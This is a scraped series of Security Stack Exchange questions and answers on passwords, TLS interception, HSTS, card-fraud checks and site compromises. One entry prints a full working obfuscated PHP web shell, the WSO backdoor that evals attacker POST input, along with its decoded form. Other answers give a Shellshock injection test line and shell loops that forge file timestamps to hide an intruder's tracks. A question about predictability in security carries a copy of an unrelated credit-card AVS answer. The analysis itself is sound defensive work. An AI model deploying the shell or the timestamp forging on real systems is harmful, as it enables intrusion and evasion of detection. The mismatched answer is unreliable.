Users often use the same passwords on multiple sites. Your site might not have any financial data, but what if the same password is used for their bank, or for an online store? You could argue that this isn't your problem, but it is a common issue, and is why whenever a breach happens, one of the immediate statements is "change your password, and change it on any other sites where you've used the same password". If your site used something like Bcrypt (without flaws in the implementation - see Ashley Madison), the chances of an attacker being able to work out what passwords have been used is slimmer, and it increases the time for users to be able to change their passwords elsewhere. If you just store the password in your DB without any hashing, an attacker can wander off with the email addresses and passwords and start attacking another site immediately. Email address and password pairs are often traded between attackers too, in the form of "combo lists", which means that even if the original attacker is only interested in your site, they might be able to get some benefit by selling the data to someone else. Added in response to comment on question mentioning 2-way encrypted storage The problem with a 2 way encryption approach is that the information to decrypt must be stored somewhere in the system. If an attacker gains access to your database, there is a good chance they have access to your encryption key too. A hash can't be reversed in this way - online tools for reversing hashes effectively look up the hash in a pre-computed list. Even if they don't have the encryption key, they might be able to work out what the key was - they can use a known plaintext attack by entering a password to your system and seeing what the result is. It probably wouldn't be a quick process, but it could be worth doing if there were any high value targets in your data (celebrities, politicians...). On the other hand, with a strong, salted, hash, the only way to find the original password with strong certainty is to hash every possible input, using the appropriate salt. With something like Bcrypt, this would take years, although weak passwords will still be found relatively quickly.
{ "source": [ "https://security.stackexchange.com/questions/103908", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90443/" ] }
104,046
I have a lot of accounts and until some time ago I used an universal password for all of them. Right now I have a different password for every account depending on the website name that I am logging in. I use a pattern and the difference between patterns is the website domain name. I dont want to store my password in some kind of password manager. I just want to have a pattern in mind and compose the password depending of it (and a piece of paper hidden somewhere safe in the house in case I am really dumb and I forget the pattern). Could you suggest me some good patterns? So I can get one or a mix of them to make a better pattern for my passwords. Is there any better way to store passwords but still access them if you need to log from another computer/device?(I dont really trust password managers)
None . Use a password manager application to generate long, random password for each site. Make sure you are not using your master password (or a derivation of your master password) anywhere else. If you do not trust online or commercial password managers, then use one that is open source and works with local files. Edit : For reference, Bruce Schneier has published in 2014 a rather complete (and very readable) blog post as to why using any kind of pattern for generating passwords is a bad idea.
{ "source": [ "https://security.stackexchange.com/questions/104046", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87210/" ] }
104,338
While on holiday in France in May I received an email from Google "New sign-in". Your Google Account was just used to sign in: Nairobi, Kenya . Tuesday, 26 May 2015 22:10 (East Africa Time). I hastily changed my password. I've never been to Kenya. My question is: How did this happen? I believe I practised good security: My password was long—four words similar to smoke daily us sitting (I chose this password in 2014, upgrading from something similar to m0zzarella ). I never used this password for anything else. I used two-factor authentication to receive codes by SMS (no smartphone, so no authenticator app). I created an app-specific password for my phone's email app (Nokia S40 phone). Why didn't two-factor authentication stop the hacker? Here's what I did on holiday: Checked my email Used a web browser on my phone to log in to a Google website. I can't remember which web browser I used. I had both Nokia Xpress (default browser) and Opera Mini. (Since then a software upgrade replaced the default browser with a version of Opera Mini). I know both of these work by 'sending the data via their servers'. Is it possible a password or SMS was intercepted? All this happened while I was on holiday and using a foreign phone network. Has this happened to anyone else? It's a shame Google didn't prevent the sign-in. Previously on another account Google contacted me "Suspicious sign-in prevented" when someone tried to log in from China.
Your password was not stolen. As you pointed out, Opera Mini uses proxy servers. Per the link provided in thexacre's answer , Google incorrectly identifies the servers as being in Nairobi, Kenya: When you use Opera Mini, you're connected to Opera servers, which download websites you want, compress and transform them, and at the end they are sent to your phone. So the idea is similar to proxy servers. IP address on the screenshot you attached is in fact one of Opera Mini servers, so you shouldn't be worried. I don't know why it's detected as Kenya, you'd better ask Google. So everything was fine except for Google's IP geolocation.
{ "source": [ "https://security.stackexchange.com/questions/104338", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9374/" ] }
104,363
In my company we were writing a small web application which would be hosted and tested under HSTS protocol. One of my tester complained that the username and password can be seen in cleartext so it is insecure. I replied that due to HSTS implementation it cant be decrypted. I pointed out wireshark logs and proved that it is encrypted. My tester pointed out Firebug of his own browser and said that it is displaying cleartext username and password so it is insecure. From the above, here are my analysis and questions: Since HSTS enables security when the data moves from browser to web sever, Firebug is just a browser plugin, it knows everything in the DOM tree so it can view forms fields, usernames and passwords. Is it possible to disable Firebug from identifying dom tree? Does revealing the content from Firebug is really a vulnerability? If yes how can I mitigate it?
Sounds like there is some confusion over the protections that different parts of your system provide. HSTS enforces HTTPS for users who have previously visited the site over HTTPS, for a given period. If a user has never visited the HTTPS version of a site, and the site is also available over HTTP (without a redirect to HTTPS), it will do nothing - the traffic will be unencrypted. Firebug accesses data after decryption - it's a debugging tool. If the browser can see it in clear, Firebug can see it in clear. This is not a vulnerability, unless the website is sending data which shouldn't be sent (e.g. passwords from server), in which case the vulnerability lies with the website, not with Firebug. If you are sending passwords from the server to the client, you have a problem - this should never be required. Passwords should be considered as a one way thing - users type them in, and they are checked on server side. This minimises the chance of any passwords being discovered without a larger server compromise.
{ "source": [ "https://security.stackexchange.com/questions/104363", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11679/" ] }
104,495
I installed Kaspersky internet Security 2016 on my laptop; in Firefox and Edge the root issuer is Kaspersky Anti-Virus Personal Root Certificate. but in chrome the root issuer is GeoTrust. in my knowledge the Root CA certificate is self signed By Root. how Kaspersky changed the issuer name? also it changes the Certificate Hierarchy in Firefox the Hierarchy is : Kaspersky Anti-Virus Personal Root Certificate www.google.com but in chrome the Hierarchy is : GeoTrust Global CA Google Internet Authority G2 *.google.com I check some another site but the all browser showed me an identical result? is this related to google chrome certificate pinning for some url?
This "Kaspersky Anti-Virus Personal Root Certificate" is the sign that your anti-virus is actively intercepting the connection, in effect running a Man-in-the-Middle attack . This can work because your anti-virus runs locally (on your computer) its own certification authority, and inserted the corresponding CA key in the "trusted store" used by your browsers (well, not all of them, since it apparently did not do the job for Chrome -- as was remarked by @Neil, Chrome does not liked to be fooled about Google's certificate). Thus, the anti-virus generates on-the-fly a fake certificate for Google, which fools your browsers. The certificate you see in Edge or Firefox is not the one that Google's server sent, but the imitation produced locally on your computer by Kaspersky. Anti-virus software does such things in order to be able to inspect data as it flows through SSL, without having to hook deep inside the code of the browsers. This is an "honest MitM attack".
{ "source": [ "https://security.stackexchange.com/questions/104495", "https://security.stackexchange.com", "https://security.stackexchange.com/users/36622/" ] }
104,566
Both are binaries and I guess that AV products know that .scr files that are not screensavers should be dealt with with "special care". I see quite a lot of "Document.pdf.scr" malware samples and can't explain why it's better than plain ol' executable...
Probably because user education has focussed on ".exe extensions are bad", so a .scr might have a better chance of being run, especially if the email claimed it was a script to do something useful.
{ "source": [ "https://security.stackexchange.com/questions/104566", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71647/" ] }
104,576
My college administration is forcing us to install Cyberoam Firewall SSL certificate so that they can view all the encrypted traffic to "improve our security". If I don't install the certificate than I won't be able to use their network. What are the ways I can protect my privacy in such a situation? Will using a VPN be enough to hide all my traffic or there are other ways?
Don't install their certificate on any device/OS installation which you ever want to use for private activity. Once you do, your traffic is subject to MITM attacks even if you are not using your college's network . Such an attack requires having the private key for the certificate you installed, but in practice this is quite easy because these "security products" are so badly designed, and often use either very weak key generation or use a fixed private key that's the same for all deployments and available to any of their customers. In a comment that's since been moved to chat, TOOGAM wrote: Specific problem known about this specific vendor's certificate "It is therefore possible to intercept traffic from any victim of a Cyberoam device with any other Cyberoam device - or to extract the key from the device and import it into other DPI devices" If you don't need resources on their network, just use wifi tethering on your phone or get a dedicated 3G USB dongle or similar for use when you're on campus. Alternatively, if non-HTTP traffic is not subject to the MITM, you may be able to use a VPN without installing the certificate. In this case, just get a cheap VPN provider or VPN to your home network if you have one. If you do need access to resources that are only available from the campus network, install another OS in a virtual machine with the MITM CA installed only in the VM, and use the browser in the VM for accessing these resources.
{ "source": [ "https://security.stackexchange.com/questions/104576", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91075/" ] }
104,588
In the U.S., many credit card machines at places like gas stations have started asking for your ZIP (postal) code to use a credit card ostensibly to help verify that you really are the cardholder, rather than the card being stolen. My question is simply: Is there any evidence that this actually leads to a significant reduction in successful credit card fraud? It seems to me like this would not be a very useful measure for a machine that requires the card to be present anyway. I would have guessed that the most common way someone would physically end up with your credit card would be if they stole your wallet, in which case they almost certainly have at least one and likely several IDs that include your ZIP code. For example, in my wallet, at the very least, my driver's license, car insurance card, business card, and pilot certificate all have my zip code listed and it would also be trivial to figure out from my voter registration card. Thus, I'm curious if any actual security benefit has been shown for this or not.
Is there any evidence that this actually leads to a significant reduction in successful credit card fraud? Yes there is evidence, and Yes , it absolutely has resulted in reducing many types of card fraud: The fraud prevention feature you are referring to is called Address Verification Service (AVS). AVS service checks that the street number and/or the zip code presented at the terminal match the data present for the card holder at the issuing bank. In real-time, the payment processor will return an AVS Response. Based on the response, the merchant can decide to reject a non-conforming transaction. It has been adopted by nearly every card issuer in the US. See Merchant Guide to the Visa Address Verification Service The possible response codes, and the configurable reject settings are shown here: In a gas station terminal setting, the terminal might be set to reject AVS Response codes N and A, for example.
{ "source": [ "https://security.stackexchange.com/questions/104588", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46674/" ] }
104,598
Unpredictability and Predictability in security. I am tasked to come up on which is more important in terms of security, if possible, on cyber security. After reading through several articles on cyber security, i noticed many of the examples used falls under predictability, as most security engineers are dealing with known threats throughout the cyber world, however, is it possible to classify them as part of unpredictability as well. Since it is impossible to know when an attacker will attack, how he/she will attack, how much resources he/she will use. Like a vaccine, you would not know when you will get sick, therefore, having regular vaccine shots will keep you safer, in a sense. However, similar to cyber security, if we are to discuss about unpredictability, we will not know what new kinds of attacks are developed and can our current defending system defend against such new attacks. In my opinion, unpredictability is without a doubt the more important factor compared to predictability. How am i to go about debating and explaining about this? Are there any references that I can look into to understand more about this factor? P.S Such a good question yet it is closed
Is there any evidence that this actually leads to a significant reduction in successful credit card fraud? Yes there is evidence, and Yes , it absolutely has resulted in reducing many types of card fraud: The fraud prevention feature you are referring to is called Address Verification Service (AVS). AVS service checks that the street number and/or the zip code presented at the terminal match the data present for the card holder at the issuing bank. In real-time, the payment processor will return an AVS Response. Based on the response, the merchant can decide to reject a non-conforming transaction. It has been adopted by nearly every card issuer in the US. See Merchant Guide to the Visa Address Verification Service The possible response codes, and the configurable reject settings are shown here: In a gas station terminal setting, the terminal might be set to reject AVS Response codes N and A, for example.
{ "source": [ "https://security.stackexchange.com/questions/104598", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90752/" ] }
104,808
Basically a website I am running got hacked in January and sent out a whole bunch of spam mails, traffic went through the roof, so the hosting company disabled the site back then, but that wasn't communicated well, so I'm dealing with it now. Today, I looked over the files of the website and noticed a file that was created around 5 hours before I got a warning from the hosting company about my webpage spamming. Path of the file is www/root/rss.lib.php , and the content: "< ?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit; ?> My first thought was to delete the file and make sure my password is secure, but I'm quite new at this, so advice would be appreciated.
I deobfuscated the code for you, which is encoded using Ascii Escapes: <?php $GLOBALS["vrvweypznipu"]="a"; $GLOBALS["griuefbdqc"]="auth_pass"; $GLOBALS["ctxvtooknmju"]="v"; $GLOBALS["pioykcea"]="default_use_ajax"; $GLOBALS["iwirmxlqtvyp"]="default_action"; $GLOBALS["dwembjc"]="color"; $GLOBALS["dwembjc"]="#df5"; $GLOBALS["iwirmxlqtvyp"]="FilesMan"; $oboikuury="default_charset"; $GLOBALS["pioykcea"]=true; $oboikuury = "Windows-1251"; @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("max_execution_time",0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define("WSO_VERSION","2.5.1"); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { $GLOBALS["zdizbsuefa"]="array"; $cfnrvu="array"; $GLOBALS["kcltlpds"]="array"; return is_array($GLOBALS["zdizbsuefa"]) ? array_map("WSOstripslashes",$GLOBALS["kcltlpds"]) : stripslashes($cfnrvu); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { header("HTTP/1.0 404 Not Found"); die("404"); } function WSOsetcookie($k,$v) { $GLOBALS["gvflxmt"]="k"; $cjtmrt="v"; $COOKIE[$GLOBALS["gvflxmt"]]=$ { $GLOBALS["ctxvtooknmju"] }; $raogrsixpi="k"; setcookie($raogrsixpi,$cjtmrt); } $qyvsdolpq="auth_pass"; if(!empty($qyvsdolpq)) { $rhavvlolc="authpass"; $ssfmrro="auth_pass"; if (isset($_POST["pass"]) &&(md5($_POST["pass"])== $ssfmrro)) { WSOsetcookie(md5($SERVER["HTTPHOST"]),$GLOBALS["griuefbdqc"]); } if(!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])])||($_COOKIE[md5($_SERVER["HTTP_HOST"])]!= $rhavvlolc)) { wsoLogin(); } } function actionRC() { if(!@$_POST["p1"]) { $ugtfpiyrum = "a"; $GLOBALS["vrvweypznipu"] = array("uname"=>php_uname(), "php_version"=>phpversion(), "wso_version"=>WSO_VERSION, "safemode"=>@ini_get("safe_mode")); echo serialize($ugtfpiyrum); } else { eval($_POST["p1"]); } } if(empty($POST["a"])) { $GLOBALS["isvexy"]="default_action"; $GLOBALS["uoechymzddd"]="defaultaction"; if(isset($GLOBALS["iwirmxlqtvyp"]) && function_exists("action".$GLOBALS["uoechymzddd"])) { $_POST["a"]=$GLOBALS["isvexy"]; else { $_POST["a"]="SecInfo"; } } } if(!empty($_POST["a"])&&function_exists("action".$_POST["a"])) { call_user_func("action".$_POST["a"]); } exit; ?> As you can see, it's turning off your error logging , and not allowing you to log errors, then it's setting the max_execution_time to 0 . Judging by these settings, it looks like it's trying to prevent you from finding out if there's an error, and from getting more information about what's going on, in the log files. The max_execution_time variable, along with set_time_limit(0) , may be used to allow the script to run indefinitely . The purpose of this, in general, is to allow large SQL queries to run. So what else does it do? With this line here: eval($_POST["p1"]); ( deobfuscated ) eval($_POST["\x70\x31"]); ( obfuscated ) ...it allows the attacker to execute any kind of PHP code they want on your system. At this point, you are completely unsafe, and should assume everything is compromised on your server. The eval() line is used to create an arbitrary code execution backdoor into your web pages. This line allows them to POST this: yourpage.php?p1=execute_dangerous_code_here , which is pretty dangerous. The entire code is based around hiding itself. If you don't send the p1 variable, then it looks for the PHP version, etc., and puts it into $GLOBALS["vrvweypznipu"] , so it (presumably) can help find other exploits. If you do post it, it executes the code and continues normally. Now, this could be pretty error prone -- trying to get your arbitrary code working -- unless you tested it out beforehand, but it won't let you know if there's an error since it's disabled logging , and errors . I highly recommend nuking from orbit with a fresh install. Restore a backup of all of your WordPress files. If you have no backups, and have to rely on what you have on the server, then you'll have to clean them yourself. If you know how to code, look for anything in your PHP files containing this string: " eval($ ", (or even " eval( "). You'll need to open the files for editing to ensure they're legitimate and, if not, remove all files containing it. In fact, if you ever see obfuscated code like this, assume it's a hack. There's pretty much no reason to ever code like this. No legitimate service should ever do it.
{ "source": [ "https://security.stackexchange.com/questions/104808", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91290/" ] }
104,813
I found this code, followed by several bash commands downloading and running a payload from the web, in the referer field in my apache error logs. The attack appears to work by converting a command name into a funtion name for the empty function body, (){ :; } . This is clearly attempting to perform a bash command injection. What servers, configurations, or modules might be vulnerable to this attack?
This is targeting the Shellshock bug (which even has its own tag ): GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Affected are any systems which run a vulnerable Bash version and a way for an attacker to inject an environment variable. The most well known case is Apache which automatically sets certain environment variables from the request. You don't need a Bash CGI. See this article about Shell Shock Exploitation Vectors for an extensive list. In order to defend against this attack you must update your Bash. To test if your Bash version is vulnerable, you may execute the following line from @EliahKagan's great answer : x='() { :;}; echo VULNERABLE' bash -c : See Everything you need to know about the Shellshock Bash bug or the corresponding CVE for more information.
{ "source": [ "https://security.stackexchange.com/questions/104813", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91293/" ] }
105,124
The OWASP Forgot Password Cheat Sheet suggests: Whenever a successful password reset occurs, the session should be invalidated and the user redirected to the login page I'm failing to understand why this is so important. Is there a security basis for this recommendation and if so, what is it?
Lets say an attacker has your password. You log in and reset it. If the reset doesn't invalidate all existing sessions, the attacker still has access, as long as they don't let their session expire. The reset hasn't actually achieved anything in this scenario. Depending on what the site does, there could also be issues with having you signed in under a password which is now out of date. Lets say your password is used to unlock something, you are signed in with "password1", but the server now has your password saved as "password2", what happens? This is obviously hypothetical, but hopefully illustrates the point. Redirecting to the login screen I guess is just a recommendation. I'm not sure why it matters where you send the user, but from a usability point of view it makes more sense to send the user to a login page rather than the home page.
{ "source": [ "https://security.stackexchange.com/questions/105124", "https://security.stackexchange.com", "https://security.stackexchange.com/users/56212/" ] }
105,150
I always thought the greatest benefit of the logs is to confirm to you that your machine has been hacked. However I see hackers bragging about "rooting" servers all over the Internet. Whats stopping a hacker with root access from deleting the logs in order to cover their tracks?
Why is it possible for the root user to delete the logs? Because you need to be able to manage the server. Whats stopping a hacker with root access from deleting the logs in order to cover their tracks? Regarding local logging, only their own stupidity. Regarding external logging, their skill set and yours. There are many, many different ways to "log." In fact, you could have the rooted machine log to a separate, hidden device that can't easily be overwritten, such as a raspberry pi / arduino logger, of which I have a few. In Linux, root is supposed to be able to do pretty much everything. In Windows, the same concept applies; if you have root access to a machine, you will be able to do almost anything you want to that machine, which includes deleting logs. You can also log all connections to a certain machine, especially if it isn't supposed to be "accessed" in the first place. How would you find out what's going on, and how would you circumvent it? Here's a way to find all changes in the last 120 minutes: find / -mmin -120 -printf '%p\t%a\n' Nice, huh? Gotcha, hacker! Mwahahaha... but you can change these attributes if you know what you're doing, like so: touch -d "24 hours ago" <file> Even worse, automating it: find / -print | while read file; do touch -d "$(date -r "$file") - 24 hours" "$file" done But wait, Mark Hulkalo! If all the files were last edited 24 hours ago, then that clearly shows we've got a haxor! True, but you can also apply $RANDOM where 24 exists. Here's an example of a number from 1-24: $((RANDOM % 10) + 1) . Now it doesn't look so easy to discover, does it? But what if all files look like that, especially files which aren't supposed to be changed? Limit the scope to a certain directory, such as /root . There are lots of ways to mask your presence locally. Unless the attacker forgot to cleanse ~/.bash_history , you'll be flying blind. Really, if the only "logging" you have is ~/.bash_history , then you're in trouble if your attacker is at least moderately intelligent. That can be erased on each user account with astounding ease, so as long as you have the appropriate permissions. It's much easier to log entries somewhere it won't be easily detected or modified, such as an external device. While it's possible to use forensics to recover your attacker's footprints, it's very, very easy to circumvent if you know what you're doing. This is why external logging is a much better solution. And that's the story of why external logging is generally the answer... keep in mind there are also ways to circumvent external logging. Nothing is ever 100% safe; you can only make it harder for your attacker, not impossible.
{ "source": [ "https://security.stackexchange.com/questions/105150", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
105,270
We have a public facing e-commerce web site. Our credit card payment provider has told us they won't support RC4 encryption anymore. They said that users with older browsers may or may not be able to place orders on our site. If we disable SSLv3 on our website, what will happen to users with an older browser when they try to access the HTTPS pages?
If you disable SSLv3 on your site, then older browsers that do not support TLSv1 or higher will not be able to connect to your site by SSL/TLS. Having said that, SSLv3 has been deprecated for some time, thanks to POODLE . As a result, many web sites that employ SSL/TLS have stopped supporting SSLv3 for a while now. So, users that are still using older browsers that do not support TLSv1.0 or higher are likely to be having problems connecting to many sites by SSL/TLS (in addition to yours if you've disabled SSLv3). In fact, in addition to the payment card industry (PCI) requiring sites that accept card information to disable SSLv3 - they are in the process of mandating that these sites phase out support for TLSv1.0 as well . Soon, all sites that accept card information will be required to support TLSv1.1 or higher. Edit: See this Wikipedia page for a good reference on SSL/TLS protocols supported by various browsers.
{ "source": [ "https://security.stackexchange.com/questions/105270", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91690/" ] }
105,339
I have recently started to make use of a password manager and good password practices. I have a different password for each site that I use. If I accidentally use the password from another site when logging in to a webpage, should I consider the password compromised and change it? E.g. If my password for www.example.com was passwordOne And my password for www.ejemplo.com was contraseñaUno And I accidentally try to log into www.example.com with password contraseñaUno Would I need to update the password for www.ejemplo.com? I can see a similar but different question here , but that relates to the password being entered into the username field.
Just to play the devil advocate... You are as likely to be compromised as if you were using the same password on both site*. As most people have pointed, you probably don't have to worry. Not so much because a website cannot make the difference between a good or wrong password but rather because most websites that you will visit will likely not log your password. The reason is simply that it provides no value to them. Most websites are there to do legitimate business and hence see no value in being malicious by recording every password entered. Still, if I had evil intention and wanted to gather many possible passwords, hosting a service online to gather passwords would probably be a better alternative than trying to brute force every possible combinations. Catching all passwords, even bad ones, is not a bad idea if you are hosting that kind of "service". Users that have multiple passwords are very likely to enter the wrong passwords on the wrong site, hence logging bad attempts as well as good attempt is a good attack plan. For example consider this quote from https://howsecureismypassword.net/ This site could be stealing your password… it's not, but it easily could be. Be careful where you type your password. It put things in perspective. Also, is such evil "service" so unlikely? It's hard to say but for sure it's nothing new: https://xkcd.com/792/ Note* : Well, I did say "as likely" but it's not exactly true. By using the same password on many sites you are not only vulnerable to malicious sites but also to the incompetence of site owners. Many websites still store your password in plaintext in their database or use weak hashing, which means that if an attacker is able to steal their database your password is compromised.
{ "source": [ "https://security.stackexchange.com/questions/105339", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87864/" ] }
105,360
I flew from overseas back to the USA and all my electronic equipment was seized by Homeland Security, including my laptop computer, external hard drives, flash drives, etc. After more than a month I have finally gotten my stuff back. I have 2 questions: Is it known whether Homeland Security has ever planted spyware, viruses, tracking devices, etc. on seized computers? What should I look for, what steps should I take to sanitize my stuff, what would you do? EDIT: I can't reformat, burn hard drive, etc. as some have suggested because very important work is on the laptop, i.e. software I've been working on for over a year. Yes, I had backups of all my data. Unfortunately, the backups were all with me, and they seized all of those too (2 external hard drives, 3 usb flash drives). So merely utilizing backups isn't an option. Also, someone said people can't help me without breaking laws. I am unaware of any laws which state it is illegal to remove spyware/malware/viruses, or that it is illegal to remove anything the government put on your computer. EDIT: I guess I could rephrase the question as "how would you go about getting source code you had written (text files) off the computer safely, 'safely' meaning scanning text files to detect anything unusual, and then transmitting or somehow putting them on another computer?"
Given that your laptop was in possession of a government entity with unknown intentions towards you for an extended duration, there's really no way you can restore it to a fully trustworthy state. If you assume the U.S. DHS to be hostile, then the only secure process to move forward with includes: Assume all data on the laptop, and all other confiscated hardware, to be compromised. Change all passwords for accounts which may have been stored/cached on the devices. Change all passwords for other accounts which use the same password as the accounts which may have been stored/cached on the devices. Void all payment mechanisms which may have been stored/cached on the devices. Communicate appropriate privacy warnings to potentially-affected third parties. Assume the laptop, and all other confiscated hardware, was modified to allow future collection of data, or control of the system, by U.S. DHS or related agencies. Destroy the devices. Do not capture any backup images or copy any files. Just burn/shred/pulverize/crush them as-is. Purchase replacement hardware/software from a trusted source, through a trustworthy supply chain, and re-build from scratch. If trustworthy backups exist (backups which were not also confiscated, and would not be remotely accessible with credentials that may have been stored/cached on confiscated devices), restore data from those sources as needed. Anything short of this leaves open several extremely undesirable possibilities: U.S. DHS may continue to have access to your online accounts and/or financial resources. One or more of your devices may have persistent malware which allows U.S. DHS, or related agencies, to spy on you or control your systems. And you're back to #1. Files stored on one of your devices may have malware which will install itself upon opening. Then see #2. Hardware or firmware on one of your devices may have been modified to include malware, which may install itself upon connection to another device. See #2 again. Any software projects you were working on, and/or the tools you use to compile them, may have been modified to include malware. Back to #2 again, and also add further impact to your customers if it's not discovered and dealt with before distribution. You should check out the 10 Immutable Laws of Security . Law #3 certainly applies. Assuming they've exploited that law, you can probably bet Laws #1 & #2 also apply. Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore Law #2: If a bad guy can alter the operating system on your computer, it's not your computer anymore Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore Also check out the 10 Immutable Laws of Security Administration . Here, Law #4 is most apropos. Law #4: It doesn't do much good to install security fixes on a computer that was never secured to begin with
{ "source": [ "https://security.stackexchange.com/questions/105360", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91785/" ] }
105,625
